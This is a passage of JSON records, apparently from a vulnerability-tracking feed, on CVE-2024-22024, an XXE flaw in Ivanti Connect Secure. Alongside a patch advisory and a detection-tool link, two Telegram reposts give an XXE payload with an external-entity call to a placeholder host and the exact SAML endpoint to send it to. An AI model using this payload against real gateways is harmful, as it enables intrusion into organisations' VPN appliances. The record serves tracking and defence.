\u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 Connect Secure, Policy Secure \u0438 \u0448\u043b\u044e\u0437\u044b ZTA. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0438\u0437\u044b\u0432\u0430\u044e\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0442\u0447\u0438 \u043d\u0430 \u0441\u0432\u043e\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.\n\nhttps://xakep.ru/2024/02/09/ivanti-cve-2024-22024/", "creation_timestamp": "2024-02-09T18:18:29.000000Z"}, {"uuid": "f0b25dc7-8cc5-438d-9124-c946ac5e98da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/448", "content": "CVE-2024-22024\n\nXXE on Ivanti Connect Secure\n\n\u2620\ufe0f payload encoded base64:\n %xxe;]&gt;\n\nsend it to:\n127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm\n\n#bugbountytips #cve #Ivanti\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/BugCod3BOT \n\ud83d\udce3 T.me/BugCod3", "creation_timestamp": "2024-02-10T02:35:18.000000Z"}, {"uuid": "cb203911-da75-4d2d-87d1-59e9326b54f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/6181", "content": "CVE-2024-22024 - XXE on Ivanti Connect Secure \n\npayload encoded base64:\n\n&lt;?xml version=\"1.0\" ?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % xxe SYSTEM \"http://{{external-host}}/x\"&gt; %xxe;]&gt;&lt;r&gt;&lt;/r&gt;\n\n\u26a0\ufe0f send it to  127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm\n\n#CVE #Payload \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-02-10T09:36:48.000000Z"}, {"uuid": "92a137fb-8c48-43b1-884f-8cebc55b9969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9948", "content": "#Blue_Team_Techniques\n1. A repository of code signing certificates known to have been leaked/stolen, then abused by threat actors\nhttps://github.com/WithSecureLabs/lolcerts\n2. Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure\nhttps://github.com/0dteam/CVE-2024-22024", "creation_timestamp": "2024-02-11T00:55:04.000000Z"}]}